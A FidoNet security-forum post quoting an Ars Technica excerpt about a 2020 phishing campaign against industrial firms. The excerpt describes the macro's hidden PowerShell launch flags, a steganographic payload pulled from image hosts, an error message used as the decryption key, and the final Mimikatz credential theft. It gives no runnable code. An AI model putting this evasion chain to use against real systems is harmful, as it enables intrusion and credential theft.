MSGID: 2:221/1.58@fidonet e4eb58fa   
   PID: OpenXP/5.0.44 (Win32)   
   CHRS: ASCII 1   
   TZUTC: -0400   
      
   >==================================================================<   
    ** Original area               : "/grc/security"   
    ** Original message from       : jeff@jeffroot.us (Jeff Root)   
    ** Original message to         :   
    ** Original date/time          : 30 May 20, 15:19   
   >==================================================================<   
      
   This is truly a thing of beauty.   
      
   If only they'd chosen niceness, instead of evil.   
      
   https://arstechnica.com/information-technology/2020/05/an-advanc   
   d-and-unconventional-hack-is-targeting-industrial-firms/   
      
   Whoever is behind this, is truly an artist.   
      
   Jeff   
      
   >==================================================================<   
   Excerpt from the article:   
   >==================================================================<   
      
   The attacks begin with emails that are customized for each target..   
      
   For the exploit to trigger, the language in the email must match the   
   localization of the target's operating system..   
      
   Recipients who click on a request to urgently enable the document's active   
   content will see no indication anything is amiss. Behind the scenes,   
   however, a macro executes a Powershell script. The reason it stays hidden:   
   the command parameters:   
      
       ExecutionPolicy ByPass-to override organization policies   
       WindowStyle Hidden. This hides the PowerShell window   
       NoProfile, which executes the script with no end-user configuration.   
      
   Triple-encoded steganography, anyone?   
      
   The PowerShell script reaches out to either imgur.com or imgbox.com and   
   downloads an image that has malicious code hidden inside the pixels   
   through a technique called steganography. The data is encoded by the   
   Base64 algorithm, encrypted with an RSA key, and then Base64-encoded   
   again.   
      
   In a clever move, the script contains an intentional error in its   
   code. The resulting error message that's returned-which is different for   
   each language pack installed on the OS-is the decryption key.   
      
   The decrypted and decoded data is used as a second PowerShell script that,   
   in turn, unpacks and decodes another blob of Base64-encoded data. With   
   that, a third obfuscated PowerShell script executes Mimikatz malware   
   that's designed to steal Windows account credentials used to access   
   various network resources. In the event stolen credentials include those   
   for the all-powerful Windows Active Directory, attackers have access to   
   virtually every node on the network.   
      
   >==================================================================<   
      
   --- OpenXP 5.0.44   
    * Origin:  (2:221/1.58)   
   SEEN-BY: 1/123 90/1 120/340 601 123/131 226/30 227/114 702 229/101   
   SEEN-BY: 229/424 426 452 664 1014 240/5832 249/206 317 400 292/854   
   SEEN-BY: 317/3 322/757 342/200   
   PATH: 221/1 280/464 229/101 426